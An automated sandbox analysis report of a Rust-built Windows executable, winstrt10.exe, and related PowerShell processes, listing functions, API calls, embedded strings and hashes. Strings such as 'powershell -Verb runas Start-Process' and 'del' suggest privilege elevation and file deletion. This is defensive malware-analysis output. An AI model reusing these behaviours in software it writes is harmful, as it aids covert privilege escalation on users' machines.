Instruction Fuzzy Hash: 7541AD62F0C79101EA10DB2269082FA5311BF46BF4F248631EE2C877FADE3ED5428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3E100, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E3E1B3
memmove.VCRUNTIME140 ref: 00007FF606E3E233
memmove.VCRUNTIME140 ref: 00007FF606E3E272

Strings

stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs, xrefs: 00007FF606E3E2E3

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs
API String ID: 2162964266-704964686
Opcode ID: e79331bed9875dc77c98c0c6f5d64a739d2cbce2b7eb7a883475d5b39b377b5d
Instruction ID: 8e309958d74726ebce7077bbda57332a039bf9586df050e4b39514a66c07f3f0
Opcode Fuzzy Hash: e79331bed9875dc77c98c0c6f5d64a739d2cbce2b7eb7a883475d5b39b377b5d
Instruction Fuzzy Hash: 9F412B32F0C75241EA209B1599082FB5720FB467E4F644631EE6D9BBEADE3DE5468300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3DD80, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF606E3F3B0: memmove.VCRUNTIME140 ref: 00007FF606E3F3FF
Part of subcall function 00007FF606E3F3B0: memmove.VCRUNTIME140 ref: 00007FF606E3F472

memmove.VCRUNTIME140 ref: 00007FF606E3DE92
memmove.VCRUNTIME140 ref: 00007FF606E3DEAA

Strings

stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs, xrefs: 00007FF606E3DEBD
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E3DEE3

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: called `Result::unwrap()` on an `Err` value$stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs
API String ID: 2162964266-325024098
Opcode ID: f69e7fa7bf9ac8ec2f39a6dc52de43ef0154c7b927b3edd6ac1689c640563844
Instruction ID: 4392081720644de5d86fcc46d5c5b9df6dacb7be8ab1084db9b4f86ec9acae4e
Opcode Fuzzy Hash: f69e7fa7bf9ac8ec2f39a6dc52de43ef0154c7b927b3edd6ac1689c640563844
Instruction Fuzzy Hash: 7D41411251C3C184E7118329E0A879BAF619793358F581065F7C90BBDACFBFD1498BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606EB2540, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF606E12970,00007FF606E95BB9,?,?,?,?,00007FF606E94F2B,?,?,?,?,00007FF606E97012), ref: 00007FF606EB2568
GetEnvironmentVariableA.KERNEL32(?,?,00007FF606E12970,00007FF606E95BB9,?,?,?,?,00007FF606E94F2B,?,?,?,?,00007FF606E97012), ref: 00007FF606EB258E
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF606E12970,00007FF606E95BB9,?,?,?,?,00007FF606E94F2B,?,?,?,?,00007FF606E97012), ref: 00007FF606EB25AF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF606E12970,00007FF606E95BB9,?,?,?,?,00007FF606E94F2B,?,?,?,?,00007FF606E97012), ref: 00007FF606EB25C0

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: realloc$EnvironmentVariablefree
String ID:
API String ID: 2828309815-0
Opcode ID: 8639e72a8be18d33545ec63bd33454072359233b89793295497a631e42e859dc
Instruction ID: ecb52033b0bca3926138fa2a88d509589c67f4bf80fa8545aad849893c6ea535
Opcode Fuzzy Hash: 8639e72a8be18d33545ec63bd33454072359233b89793295497a631e42e859dc
Instruction Fuzzy Hash: 2411A921B0EB428AEB659B12655423BA291FF48FC0F681435DF4E83B58EE3EE5414745

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 7148 Parent PID: 7096 powershell.exeCOMMON

Executed Functions

Function 00007FFA35A46196, Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.648891674.00007FFA35A40000.00000040.00000001.sdmp, Offset: 00007FFA35A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65f7832045e20cd3f288040d8522af832c7c81ea765473c9ac206a8101bc268
Instruction ID: 6c4b114dc23239a3411ab791e9bd7a875a5caafc75b277e598712dd0952afbdc
Opcode Fuzzy Hash: a65f7832045e20cd3f288040d8522af832c7c81ea765473c9ac206a8101bc268
Instruction Fuzzy Hash: 38F1C470918A8E4FEBA8DF28C84A7E937D1FF55300F04826ED84DC7291DF75A9449B82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A41C59, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.648891674.00007FFA35A40000.00000040.00000001.sdmp, Offset: 00007FFA35A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c8538bc79ec55b2f2aa31e57963085c8bf9cd12732da76f04586130130dc2a
Instruction ID: be909c8006ba13f4ab54099144f97af65bc6a6a129177dd09bdd00384b1a6ec7
Opcode Fuzzy Hash: 71c8538bc79ec55b2f2aa31e57963085c8bf9cd12732da76f04586130130dc2a
Instruction Fuzzy Hash: 0A51373191CA8A4FD304DB5DD856AA6BBE1FFC6310F0486BBE04CC72A2DE299945D781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35A41775, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.648891674.00007FFA35A40000.00000040.00000001.sdmp, Offset: 00007FFA35A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcda4cf60ba68f2e822a9e1746e51c47ed0457f9e9c5c76a732e3260d993fc01
Instruction ID: b81577d4c8f52c9587ab7535c109fdc07905ec6d643fa92fc30e327194149282
Opcode Fuzzy Hash: fcda4cf60ba68f2e822a9e1746e51c47ed0457f9e9c5c76a732e3260d993fc01
Instruction Fuzzy Hash: 6401A77015CB0C4FD748EF0CE451AA6B7E0FF85324F10052EE58AC3251DA32E882CB41

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 5992 Parent PID: 7096 powershell.exeCOMMON

Executed Functions

Function 00007FFA35A21775, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.670650303.00007FFA35A20000.00000040.00000001.sdmp, Offset: 00007FFA35A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8192baa65028a7639db6535033d9d6e65af33cc21e154c1d673825322934023
Instruction ID: 7a6b690a2faf1b6214c5bb9641563b8883d7adeafaf73d7d596997f60df9ac48
Opcode Fuzzy Hash: a8192baa65028a7639db6535033d9d6e65af33cc21e154c1d673825322934023
Instruction Fuzzy Hash: 4701A73015CB0C4FD748EF0CE451AA6B3E0FF85324F10052EE58AC3251DA32E882CB41

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: winstrt10.exe PID: 3492 Parent PID: 3424 winstrt10.exeCOMMON

Executed Functions

Function 00007FF78D1F6C70, Relevance: 70.2, APIs: 38, Strings: 7, Instructions: 2704COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1F77C2
memmove.VCRUNTIME140 ref: 00007FF78D1F7879

Strings

exeNULcouldn't generate random bytes: , xrefs: 00007FF78D1F8CDD
assertion failed: self.len() < CAPACITY/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\node.rs, xrefs: 00007FF78D1FA12F, 00007FF78D1FA14C
called `Option::unwrap()` on a `None` value, xrefs: 00007FF78D1FA079, 00007FF78D1FA0B4, 00007FF78D1FA0F5, 00007FF78D1FA16D
ReleaseSRWLockExclusive, xrefs: 00007FF78D1F9C8A, 00007FF78D1F9F71
internal error: entered unreachable code/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\remove.rs, xrefs: 00007FF78D1FA05C
assertion failed: self.height > 0, xrefs: 00007FF78D1FA0D1
AcquireSRWLockExclusive, xrefs: 00007FF78D1F9C48, 00007FF78D1F9EC9

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$assertion failed: self.height > 0$assertion failed: self.len() < CAPACITY/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\node.rs$called `Option::unwrap()` on a `None` value$exeNULcouldn't generate random bytes: $internal error: entered unreachable code/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\remove.rs
API String ID: 2162964266-435946001
Opcode ID: 8c32c9fe88ee5423dea5948312a63b53bf29f5e5f43d2b40e85fbfabf480166a
Instruction ID: a9f5783eed4a23ec360ad6f586bd0866621ed743bc734c9f39c619790e3b3a55
Opcode Fuzzy Hash: 8c32c9fe88ee5423dea5948312a63b53bf29f5e5f43d2b40e85fbfabf480166a
Instruction Fuzzy Hash: 48638072A09BC684EB61AF25E8443E877A0FF58798F654231DF5D0BB99EF389245C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1ECDC0, Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 621COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF78D1ECDFF
CreateEventW.KERNEL32 ref: 00007FF78D1ECE6A
CreateEventW.KERNEL32 ref: 00007FF78D1ECEDD
WaitForMultipleObjects.KERNEL32 ref: 00007FF78D1ECF71

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1ED62B, 00007FF78D1ED689, 00007FF78D1ED706

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateEvent$CloseHandleMultipleObjectsWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1194628698-2333694755
Opcode ID: b8a0bb4a52f47c24962a4a1e0c55f5fd367882df3e87babd6158e43c6dc87f4a
Instruction ID: e22c37d484770cae5019293b7f959614d57be83ee44358b7b115b5bc345fb063
Opcode Fuzzy Hash: b8a0bb4a52f47c24962a4a1e0c55f5fd367882df3e87babd6158e43c6dc87f4a
Instruction Fuzzy Hash: 0342A431E0C78286EB50AF61E9407F8A7A1FF48798FA54131EA4D47B89EF38D449C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D22DDD0, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 152libraryloadernetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF78D22DDF8
WSACleanup.WS2_32 ref: 00007FF78D22DE13
GetModuleHandleA.KERNEL32 ref: 00007FF78D22DE5C
GetProcAddress.KERNEL32 ref: 00007FF78D22DE90
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF78D22DEAA
LoadLibraryA.KERNEL32 ref: 00007FF78D22DECD
GetProcAddress.KERNEL32 ref: 00007FF78D22DEEA
LoadLibraryExA.KERNELBASE ref: 00007FF78D22DF00
GetSystemDirectoryA.KERNEL32 ref: 00007FF78D22DF16
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF78D22DF2E
GetSystemDirectoryA.KERNEL32 ref: 00007FF78D22DF42
LoadLibraryA.KERNEL32 ref: 00007FF78D22DFB0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF78D22DFBC
GetProcAddress.KERNEL32 ref: 00007FF78D22DFF0
QueryPerformanceFrequency.KERNEL32 ref: 00007FF78D22E02D

Strings

kernel32, xrefs: 00007FF78D22DE4B
iphlpapi.dll, xrefs: 00007FF78D22DE96
AddDllDirectory, xrefs: 00007FF78D22DEE0
LoadLibraryExA, xrefs: 00007FF78D22DE7E
if_nametoindex, xrefs: 00007FF78D22DFE6

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocstrpbrk
String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
API String ID: 2882270050-2794540096
Opcode ID: ed6526a9c066f6832d3423a5ca13f58926c7bbc612f5d2a82726070a7cf98017
Instruction ID: dcfa542c41b90b57ad6aee4652f71834920381e145b236f24958f92505eba918
Opcode Fuzzy Hash: ed6526a9c066f6832d3423a5ca13f58926c7bbc612f5d2a82726070a7cf98017
Instruction Fuzzy Hash: 09618035A0DA8681EBA1BB11A4547F9F3A1BF84B90FE84131D95E47794FE2CE40EC360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D22DC30, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128librarystringloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00007FF78D24694A,?,?,?,?,00007FF78D22DE3B), ref: 00007FF78D22DC44
GetProcAddress.KERNEL32(?,?,?,?,00007FF78D22DE3B), ref: 00007FF78D22DC69
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00007FF78D22DE3B), ref: 00007FF78D22DC7C

Strings

kernel32, xrefs: 00007FF78D22DC3D
AddDllDirectory, xrefs: 00007FF78D22DCC3
LoadLibraryExA, xrefs: 00007FF78D22DC5A

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcstrpbrk
String ID: AddDllDirectory$LoadLibraryExA$kernel32
API String ID: 27745253-3327535076
Opcode ID: 820f31f80df61a7f8b6ee505da82ae800b9629960f52e39176687646386c8dfd
Instruction ID: c0429808b15b0ee5acb280285b2c39af3e7c04e3a75ec546d99f44542a24cea2
Opcode Fuzzy Hash: 820f31f80df61a7f8b6ee505da82ae800b9629960f52e39176687646386c8dfd
Instruction Fuzzy Hash: 4E41EA22B0DA4242EB55AF12A4001B9E7A0FF85BD0FA88230DE1D47794FE3DD48EC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1A3012, Relevance: 19.4, APIs: 11, Strings: 1, Instructions: 1358COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1A3D2C

Strings

powershell-VerbrunasStart-Process, xrefs: 00007FF78D1A4129, 00007FF78D1A46B5, 00007FF78D1A4A6B

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: powershell-VerbrunasStart-Process
API String ID: 2162964266-217301037
Opcode ID: fe17e23d866f37588d72de9df94e5498b3a79aa18680837351228f7494875da4
Instruction ID: e7738003273edcc3fce30c887eba301187632d6ca30537e22995250d6340c4dc
Opcode Fuzzy Hash: fe17e23d866f37588d72de9df94e5498b3a79aa18680837351228f7494875da4
Instruction Fuzzy Hash: D8033F71A08BC289E7769F25E8843E977A5FB1578CF544025DA4C0FB4AEF7AA348C311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1A217B, Relevance: 11.0, APIs: 4, Strings: 3, Instructions: 527COMMON

Download Yara Rule

Strings

powershell-VerbrunasStart-Process, xrefs: 00007FF78D1A22E6
delsrc\main.rs, xrefs: 00007FF78D1A26B3
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1A2A1B, 00007FF78D1A2A85

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: called `Result::unwrap()` on an `Err` value$delsrc\main.rs$powershell-VerbrunasStart-Process
API String ID: 0-3008156810
Opcode ID: 27cafbb2a8ae84a82efacf1f6ec1b898fca54bdca7cf0ba9cffae9d767054be8
Instruction ID: d375bc0cb671d32b988b12bc5e92d3da77af2c9d2e8c159265eb748a219af2a5
Opcode Fuzzy Hash: 27cafbb2a8ae84a82efacf1f6ec1b898fca54bdca7cf0ba9cffae9d767054be8
Instruction Fuzzy Hash: F0329032E0CA8284EBA1AF65E8417F8A761FF54798FA55131DE4C0BB95FF28D189C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F2010, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 113threadCOMMON

Download Yara Rule

APIs

SetThreadStackGuarantee.KERNEL32 ref: 00007FF78D1F2059
SetThreadStackGuarantee.KERNELBASE ref: 00007FF78D1F208B
GetLastError.KERNEL32 ref: 00007FF78D1F2091

Strings

failed to reserve stack space for exception handlinglibrary\std\src\sys\windows\stack_overflow.rs, xrefs: 00007FF78D1F2196
failed to install exception handler, xrefs: 00007FF78D1F216B
SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs, xrefs: 00007FF78D1F2061

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: GuaranteeStackThread$ErrorLast
String ID: SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs$failed to install exception handler$failed to reserve stack space for exception handlinglibrary\std\src\sys\windows\stack_overflow.rs
API String ID: 3709220871-1169643954
Opcode ID: 50ad4d99c75cda853c0fbe971af2f017f6abbc4773bcd28b654bea48eef30865
Instruction ID: ebae7b38a7e7de79fc8b2db1ffcb276ae9481201dca3fbaef59cba6765214f04
Opcode Fuzzy Hash: 50ad4d99c75cda853c0fbe971af2f017f6abbc4773bcd28b654bea48eef30865
Instruction Fuzzy Hash: 68514A62F0DA1689FB50EBA0F8412ECABA1BF44754FA54035DE1E53799FE3CA449C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1ECCB0, Relevance: 10.6, APIs: 7, Instructions: 68synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF78D1ECD12
WaitForSingleObject.KERNEL32 ref: 00007FF78D1ECD1F
GetLastError.KERNEL32 ref: 00007FF78D1ECD28
CloseHandle.KERNEL32 ref: 00007FF78D1ECD6B
CloseHandle.KERNEL32 ref: 00007FF78D1ECD78
CloseHandle.KERNEL32 ref: 00007FF78D1ECD85

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$ErrorLastObjectSingleWait
String ID:
API String ID: 1454876536-0
Opcode ID: 8e412445d6ce3de83e262ef4a1acc078c02c0438c50018f82119f455caff1bd2
Instruction ID: 289dd66fb137846b6cc06f5c660b5bb8409a83bbad6426c7b0e1a00fa2e4f08c
Opcode Fuzzy Hash: 8e412445d6ce3de83e262ef4a1acc078c02c0438c50018f82119f455caff1bd2
Instruction Fuzzy Hash: DA219C22A0C64282E660BB12F9017AAEAA1FF497A0FA44031FE9D477D5EF3DD445C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D246910, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78D22DC30: GetModuleHandleA.KERNEL32(?,?,?,00007FF78D24694A,?,?,?,?,00007FF78D22DE3B), ref: 00007FF78D22DC44

GetProcAddressForCaller.KERNELBASE(?,?,?,?,00007FF78D22DE3B), ref: 00007FF78D246960

Strings

secur32.dll, xrefs: 00007FF78D246933
security.dll, xrefs: 00007FF78D24693A
InitSecurityInterfaceA, xrefs: 00007FF78D246956

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressCallerHandleModuleProc
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 2084706301-3788156360
Opcode ID: 70115b668c02f96ed13603f6ccd272816c4b37f4c3a481f87f753dd44a310f2c
Instruction ID: b8ae9d92882fa31d1c73143f329b72f572e43c5eec27aba97b9f971832835b02
Opcode Fuzzy Hash: 70115b668c02f96ed13603f6ccd272816c4b37f4c3a481f87f753dd44a310f2c
Instruction Fuzzy Hash: 84F03760E1EB0780EE98BB11A9857F496A2BF54745FE44538C80C87391FEACE55DC360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F4BD0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF78D1F4D50

Strings

/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D1F4BD0

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs
API String ID: 823142352-3047668079
Opcode ID: 6b9a796bd78838632ac86097bb02db83e91362fd05f08ce27e327cc4b9a3c45f
Instruction ID: 170d5235b2981ba2a870f3592a5dbe04b8812af5453f0a6ff048a841af02409b
Opcode Fuzzy Hash: 6b9a796bd78838632ac86097bb02db83e91362fd05f08ce27e327cc4b9a3c45f
Instruction Fuzzy Hash: 1D519E22E0C29253F7719A11B2803B9BBD1BF55354FA55135DB8C17AC0EB3DE8A8C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F6630, Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32 ref: 00007FF78D1F6678

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: OverlappedResult
String ID:
API String ID: 1111585235-0
Opcode ID: a70dc16728b5277a925ffa7beaede2057a1e5c2b2de0dc517486b0b9368e3957
Instruction ID: dfb045b9a19a8fd5830a65a8c84b9a7a3ceb7cd2325501101db11f470d0b5cee
Opcode Fuzzy Hash: a70dc16728b5277a925ffa7beaede2057a1e5c2b2de0dc517486b0b9368e3957
Instruction Fuzzy Hash: AA21D451F0C14382EE74EA21B4103BEAA51FF84794FA16132DB8E47BC4EE1CE448C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1C3E40, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00007FF78D1C3E7A

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 28b3d5cb91457ee640395d55d5ebc1573bbbfff4d63c3dac216b3624307c33d2
Instruction ID: 9615cff2a8b3ee889b3ca3720746f84b76eccc6db1fd1f177a69f007d42ee644
Opcode Fuzzy Hash: 28b3d5cb91457ee640395d55d5ebc1573bbbfff4d63c3dac216b3624307c33d2
Instruction Fuzzy Hash: 80113032A49BC194E7719F25E8447E9A365FB487B8F944321CA6C17AD8EF78918AC310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1E5BE0, Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF78D1E5C2E

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

